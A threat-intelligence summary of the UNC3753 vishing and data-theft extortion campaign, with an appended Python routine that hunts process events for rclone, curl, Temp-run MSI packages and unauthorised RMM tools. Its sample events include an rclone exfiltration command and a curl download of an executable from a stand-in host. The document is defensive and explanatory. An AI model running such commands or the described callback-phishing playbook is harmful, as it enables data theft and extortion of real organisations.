Full Report
From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," "Chatty Spider," and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States. UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to obtain remote access to corporate environments. Using pretexts such as data migration or invoice-related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records used for subsequent extortion demands. Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.
Analysis Summary
# Threat Actor: UNC3753
## Attribution & Identity
* **Name:** UNC3753
* **Aliases:** Luna Moth, Chatty Spider, Silent Ransom Group
* **Known Associations:** Financially motivated cybercrime cluster characterized by data theft extortion without the traditional use of encrypting ransomware.
## Activity Summary
UNC3753 conducted an extensive data theft and extortion campaign from January through May 2026. The campaign involved highly interactive social engineering, using vishing (voice phishing) to trick employees into providing remote access to corporate environments. The actor favors "callback phishing," in which victims are lured into calling the attacker by fraudulent invoices or data migration notifications.
## Tactics, Techniques & Procedures
* **Vishing & Social Engineering:** Conducts phone conversations posing as IT support to build rapport and guide victims through compromise steps (**T1566.004**).
* **RMM Tool Abuse:** Persuades victims to install legitimate Remote Monitoring and Management (RMM) tools to gain persistent access (**T1219**).
* **Physical Infiltration:** In rare, notable instances, individuals posing as IT technicians have entered physical corporate offices to exfiltrate data via USB (**T1052.001**).
* **Defense Evasion:** Use of code signing (**T1553.002**), masquerading files as legitimate software (**T1036.005**), and clearing Event Logs (**T1070.001**).
* **Living-off-the-Land (LotL) and Exfiltration:** Heavy use of PowerShell (**T1059.001**) and Windows Command Shell (**T1059.003**), with Rclone used to exfiltrate data to cloud storage (**T1567.002**).
* **Credential Theft:** Dumping LSASS memory and SAM databases to facilitate lateral movement (**T1003.001**, **T1003.002**).
## Targeting
* **Sectors:** Professional Services, Legal Services, and Financial Services.
* **Geography:** Primarily United States.
* **Victims:** Dozens of organizations; specifically targeted law firms and corporate offices of financial entities.
## Tools & Infrastructure
* **Malware/Utilities:** Rclone (for exfiltration), MSI installers, Curl (for secondary downloads), Screen-sharing/RMM software.
* **C2 & Infrastructure:** Command-and-control infrastructure consisted of a set of seven IP addresses.
* **Domain Patterns:** Frequent use of `-it[.]com` and `-helpdesk[.]com` suffixes for phishing and support pretexts.
## Implications
UNC3753 represents a shift toward more "human-centric" cyberattacks that bypass technical controls by exploiting trust. Their move toward physical office infiltration signals an escalation in risk, where digital threat intelligence must integrate with physical security protocols. The focus on extortion via data theft (rather than encryption) allows them to maintain a lower profile while still causing significant financial and reputational damage.
## Mitigations
* **Vishing Awareness:** Implement training specifically focusing on "callback phishing" and verifying IT support identities through official internal channels.
* **RMM Control:** Restrict the execution of unauthorized Remote Monitoring and Management tools. Use application allowlisting to block common RMM tools not used by the organization (e.g., AnyDesk, TeamViewer, Zoho Assist).
* **Physical Security:** Enhance visitor verification procedures and enforce "clean desk" policies to prevent unauthorized USB access to endpoints.
* **Monitoring:** Hunt for unusual use of `rclone.exe` or `curl.exe` and for MSI files executed from Temp directories. Monitor for unauthorized RDP or SSH connections moving laterally within the network.
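As an added example that is not part of the Mandiant report, the hunting guidance in the Monitoring item and the RMM allowlisting point above expressed as a small Python triage routine over constructed process-creation events. The event field names (Sysmon EventID 1 style), the choice to match RMM tools on the image name, and the sample paths are assumptions of this example.

```python
import re
from pathlib import PureWindowsPath

# Hunt binaries named in the report, plus name fragments of its example RMM tools
# (matching RMM tools on the image name alone is an assumption of this example).
HUNT_BINARIES = {"rclone.exe", "curl.exe"}
RMM_KEYWORDS = ("anydesk", "teamviewer", "zoho")
TEMP_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
MSI_RE = re.compile(r'"([^"]+\.msi)"|(\S+\.msi)', re.IGNORECASE)

def classify(event, allowed_rmm=frozenset()):
    """Return the report-derived reasons an event is suspicious (empty if none)."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if image in HUNT_BINARIES:
        reasons.append(f"hunt_binary:{image}")
    if image == "msiexec.exe":
        # MSI packages run through the installer service, so inspect the package path.
        for m in MSI_RE.finditer(cmdline):
            if TEMP_RE.search(m.group(1) or m.group(2)):
                reasons.append("msi_from_temp")
                break
    if any(k in image for k in RMM_KEYWORDS) and image not in allowed_rmm:
        reasons.append(f"unauthorized_rmm:{image}")
    return reasons

def hunt(events, allowed_rmm=frozenset()):
    hits = []
    for event in events:
        reasons = classify(event, allowed_rmm)
        if reasons:
            hits.append((event["EventId"], reasons))
    return hits

# Constructed sample events; field names follow Sysmon EventID 1 conventions.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Users\jdoe\Downloads\rclone.exe",
     "CommandLine": r'rclone.exe copy "C:\Shares\Legal" remote:bucket'},
    {"EventId": 2, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\jdoe\AppData\Local\Temp\support_tool.msi" /qn'},
    {"EventId": 3, "Image": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "CommandLine": "AnyDesk.exe"},
    {"EventId": 4, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\Corp\agent.msi /qn"},
    {"EventId": 5, "Image": r"C:\Users\jdoe\AppData\Local\Temp\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\jdoe\AppData\Local\Temp\u.exe http://example.invalid/u"},
]

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

Pass the organization's sanctioned RMM image names in `allowed_rmm` so a deployed tool is not reported; every other match against the report's examples is surfaced for review.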